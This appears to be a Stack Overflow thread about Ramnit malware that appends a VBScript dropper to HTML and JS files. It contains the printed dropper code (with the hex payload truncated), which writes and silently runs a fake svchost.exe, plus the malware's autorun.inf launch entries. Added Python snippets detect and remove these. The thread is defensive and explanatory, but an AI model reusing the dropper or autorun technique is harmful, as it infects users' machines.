2

Whenever I open JavaScript (.js) or HTML (.html) files after a few days in Notepad++, a similar VB script gets automatically added at the end. I strongly feel that this is some kind of virus; can anyone guide me on this?

</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- ޼ .... {Lots of junk characters here } -->
tryingToLearn
  • 1
    That looks like a virus appending code to your requests. Possibly your web host, or your ISP if these files are hosted online. It's overwriting your `svchost.exe` file, which every service runs under. – Blindy Jul 06 '15 at 13:02
  • 1
    Looks a lot like a virus, I get a few results by searching for that number "4D5A90000300000004000". The "number" is the code that will be run. If you print out what is sent to FileObj.Write you might see the code. – the_lotus Jul 06 '15 at 13:02
  • @Blindy Overwriting svchost.exe sounds scary. – tryingToLearn Jul 06 '15 at 13:07
  • 1
    It's downright terrifying, you can do *anything* afterwards. And it's very hard to manually get rid of since simply starting Windows opens and locks `svchost.exe`. Good news is you probably don't need to, there's plenty of antivirus software out there. – Blindy Jul 06 '15 at 13:09
  • 1
    Every time I open this page I get a warning from Avast - it identifies the malware as `VBS:Agent-KZ [Trj]` - that may help in removing the trojan – Jaromanda X Jul 11 '15 at 15:53
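
A way to find and strip the appended block from affected files, as an added example that is not part of the original question or its comments. The function names and the shortened sample page are constructed for illustration; the hex payload is only checked for the `4D5A` ("MZ") executable header and is never written out or run.

```python
import os
import re

# Appended block: a VBScript <SCRIPT> element plus the trailing junk comment.
DROPPER_RE = re.compile(
    rb"<SCRIPT\s+Language\s*=\s*VBScript\s*>.*?</SCRIPT>(?:\s*<!--.*?-->)?",
    re.IGNORECASE | re.DOTALL,
)
HEX_RE = re.compile(rb'WriteData\s*=\s*"([0-9A-Fa-f]{4,})')
MARKERS = (b"scripting.filesystemobject", b"wscript.shell")

def find_dropper(data: bytes):
    """Return (start, end, payload_is_pe) for an appended dropper, else None."""
    tail = data.lower().rfind(b"</html>")
    # Only look after the last </html>; .js files have none, so scan it all.
    m = DROPPER_RE.search(data, tail + 7 if tail != -1 else 0)
    if not m or not all(k in m.group(0).lower() for k in MARKERS):
        return None
    hx = HEX_RE.search(m.group(0))
    # "4D5A" decodes to "MZ", the magic bytes of a Windows executable.
    is_pe = bool(hx) and bytes.fromhex(hx.group(1)[:4].decode()) == b"MZ"
    return m.start(), m.end(), is_pe

def clean(data: bytes) -> bytes:
    """Return the file content with the appended block cut out."""
    hit = find_dropper(data)
    return data if hit is None else data[: hit[0]] + data[hit[1]:]

def scan_tree(root: str):
    """Yield paths of .html/.htm/.js files under root that carry the block."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".js")):
                path = os.path.join(folder, name)
                with open(path, "rb") as fh:
                    if find_dropper(fh.read()):
                        yield path

# Constructed sample: a tiny page with a shortened copy of the appended script.
SAMPLE = (
    b"<html><body>hello</body></html>\r\n"
    b"<SCRIPT Language=VBScript><!--\r\n"
    b'WriteData = "4D5A9000"\r\n'
    b'Set FSO = CreateObject("Scripting.FileSystemObject")\r\n'
    b'Set WSHshell = CreateObject("WScript.Shell")\r\n'
    b"//--></SCRIPT><!-- junk -->"
)
```

Cleaning the files only removes the symptom; the process that keeps rewriting them still has to be removed from the machine.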

4 Answers

3

The file it runs is %temp%\svchost.exe.

Therefore do a tasklist

tasklist /svc /fi "imagename eq svchost.exe"

Make a note of svchosts without any containing services. Put the actual PID in for xxxx

taskkill /pid xxxx /pid xxxx /pid xxxx /f

That will stop that particular part running.

The technique used by the virus won't work reliably, especially on non-English Windows.

Also, instead of deleting it, change security to prevent execution until you clean other parts that may exist.

icacls "%temp%\svchost.exe" /deny Everyone:F

This is for Vista but broadly applicable to all versions.

Virus Cleaning

If you have problems doing these in normal mode, try doing it in Safe Mode with Networking.

Click Start - All Programs - Accessories - Run and type

msconfig

Then go to the Boot tab and click Safe Boot and also tick Network. Reboot. Come back here and untick Safe Boot to return to normal mode.

Safety Scanner

The Microsoft Safety Scanner is a free downloadable security tool that provides on-demand scanning and helps remove viruses, spyware, and other malicious software. It works with your existing antivirus software.

http://www.microsoft.com/security/scanner/en-au/default.aspx

Malicious Software Removal Tool

If you can't download or run the Safety Scanner, Windows has a tiny anti virus program built in. It only targets the most common threats. It will want to update, don't let it. Run it without updating. Then run it again updating it this time.

Click Start - All Programs - Accessories - Run (or press Winkey + R). Type

mrt

Reset Firewall

You can reset your firewall to default settings.

Start - All Programs - Accessories - Right click Command Prompt and choose Run As Administrator. Type (or copy and paste by right clicking in the Command Prompt window and choosing Paste).

netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"

Security Fixits

Fixits are troubleshooting programs from Microsoft. There are 27 of them.

Automatically fix Windows security settings to keep your PC safe

http://support.microsoft.com/mats/Malware_Prevention/en-us

and

Fix security issues to protect and secure Windows automatically

http://support.microsoft.com/mats/windows_security_diagnostic/en-us

and

Fix Internet Explorer issues to make IE fast, safe and stable

http://support.microsoft.com/mats/ie_performance_and_safety/en-us

For the full list visit

http://support.microsoft.com/fixit/en-us

When you choose to download it, choose the option to run on another computer. Then you can save it to your hard disk in a folder. Open the folder, open the folder Fix it Portable, and run Launch Fix It. It will contain all 27 Fixits.

Full Time Antivirus

For a permanent anti virus, we here in the forums notice a complete lack of problems for people using Microsoft Security Essentials.

http://www.microsoft.com/en-au/download/details.aspx?id=5201

If All Else Fails

This program from Microsoft boots another basic operating system to clean Windows. You need to put it on a USB or DVD and then boot from it.

http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

Look Up Detail On The Threat

Microsoft maintains an encyclopedia of virus information.

http://www.microsoft.com/security/portal/threat/threats.aspx

user5071892
2

I also think that your system has been affected by some virus. I want to share a link which I came across that matches your question; please go through it. Here is the link: http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page

siva
1

I think it is a virus.

So, you need to install antivirus software if you do not have one.

I recommend free: Microsoft Security Essentials or Avast.

Also, you could download a special antivirus utility just for scanning, without installing it: Dr. Web CureIt!

Then make a full scan of your computer.

You should check all startup commands and remove all malicious ones. e.g. CCleaner Free could help you to check them.

UPD: After cleaning and removing startup commands you could use the sfc utility.

Microsoft Windows Resource Checker

Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.

Run cmd with admin privileges and then run sfc /scannow command.

Vlad DX
  • Too late to deal with this by changing the startup commands, it's already replaced the executable services run under. You need a full blown antivirus sweep. – Blindy Jul 06 '15 at 13:11
  • You know, it usually helps me to deal with viruses manually :-) – Vlad DX Jul 06 '15 at 13:15
0

This is a virus called Win32.Ramnit; read the description here:

https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection

I have just discovered this virus on one of my client's computers, and this virus modified all my HTML files on my USB portable hard disk.

This script executes the VBScript to create a file, execute it, and install a program in this folder:

C:\Program Files\Microsoft\DesktopLayer.exe

Read more: http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm

And for every USB pen drive that you insert into this infected PC, the virus will create 2 files:

autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe

The content of autorun.inf:

[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe

This attempts to execute the virus installer when this pen drive is inserted into another computer.

mjb
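
A check for the kind of `autorun.inf` shown in the answer above, as an added example that is not part of the original answer. It parses the `[autorun]` section and reports every launch key (`open`, `shellexecute`, `shell\<verb>\command`) that points at an executable inside a recycle-bin folder; the function names and the list of extensions are assumptions made for this sketch, and the sample is the file content quoted in the answer.

```python
import re

# Keys in [autorun] that name a program to start (icon, action etc. do not).
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
RECYCLE_DIR = re.compile(r"(^|[\\/])(RECYCLER|RECYCLED|\$RECYCLE\.BIN)[\\/]", re.I)
EXE_RE = re.compile(r"\.(exe|scr|com|pif|bat|cmd)(\s|$)", re.I)


def parse_autorun(text):
    """Return {key_lower: value} for the [autorun] section only."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(text):
    """Return sorted (key, target) pairs that start an executable
    located under a recycle-bin directory on the drive."""
    hits = []
    for key, value in parse_autorun(text).items():
        target = value.strip('"')
        if (LAUNCH_KEY.match(key) and RECYCLE_DIR.search(target)
                and EXE_RE.search(target)):
            hits.append((key, target))
    return sorted(hits)


# Sample input: the autorun.inf content quoted in the answer.
SAMPLE_INF = r"""[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
"""
```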